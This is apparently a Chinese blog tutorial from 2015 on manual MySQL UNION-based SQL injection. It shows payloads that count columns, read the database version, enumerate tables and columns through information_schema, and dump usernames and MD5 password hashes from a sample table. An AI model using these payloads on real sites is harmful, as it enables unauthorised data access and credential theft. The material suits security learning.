MYSQL手工注入入门示例

MYSQL手工注入案例

By:Topper  2015-08

 

联合注入需要注意的是两个语句所查询的字段数量上需要保持一致,否则语句无效;后面的查询语句可以通过控制使用NULL来填充查询字段的位数;

union                对两个结果集进行并集操作,重复数据只显示一次

union All          对两个结果集进行并集操作,重复数据全部显示

limit 2,1             表示查询结果从第3行开始读取只读取1行(记录集默认从0开始)

Mysql注入-探测数据库表中列的个数

通过order by num 来判断列的位数;通过不断递增num值直到出现报错为止;此时num-1即字段个数。

Mysql注入-探测哪个字段值可被注入用以显示

select * from safecheck.`user` where username='-123' union all select1,2,3,4,5,6 LIMIT 0,1 --+'

Mysql注入-查询数据库版本

示例1

select * from safecheck.`user` where username='-123' union all select 1,database(),3,4,5,6LIMIT 0,1 --%20'

示例2

select * from safecheck.`user` where username='-123' UNION ALL SELECT(SELECT @@VERSION LIMIT 1,1),NULL,NULL,NULL,NULL,NULL--%20'

Mysql注入-查询数据库表名

select * from safecheck.`user` where username='-123' UNION ALL SELECT(SELECT table_name FROM information_schema.tables where table_schema=0x73616665636865636bLIMIT 1,1),NULL,NULL,NULL,NULL,NULL--%20'

 

Mysql注入-查询数据库列名

select * from safecheck.`user` where username='-1724' UNION ALL SELECT(SELECT CONCAT(IFNULL(CAST(column_name ASCHAR),0x20),0x20,IFNULL(CAST(column_type AS CHAR),0x20)) FROMINFORMATION_SCHEMA.COLUMNS WHERE table_name=0x75736572 AND table_schema=0x73616665636865636bLIMIT 0,1),NULL,NULL,NULL,NULL,NULL--%20'

备注:

CAST(table_name ASCHAR)

CAST函数表示将表达式由一种数据类型转换为另一种数据类型,这里指将table_name字段转换为char类型。

IFNULL(expr1,expr2)

此函数表示如果expr1不是NULLIFNULL()返回expr1,否则它返回expr2

CONCAT(str1,str2,)

此函数表示返回结果为连接参数产生的字符串。如有任何一个参数为NULL,则返回值为 NULL

Mysql注入-查询数据库列值

select * from safecheck.`user` where username='-123' UNION ALL SELECT(SELECT CONCAT(username,'|',pwd_md5) from user LIMIT0,1),NULL,NULL,NULL,NULL,NULL--%20'

  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值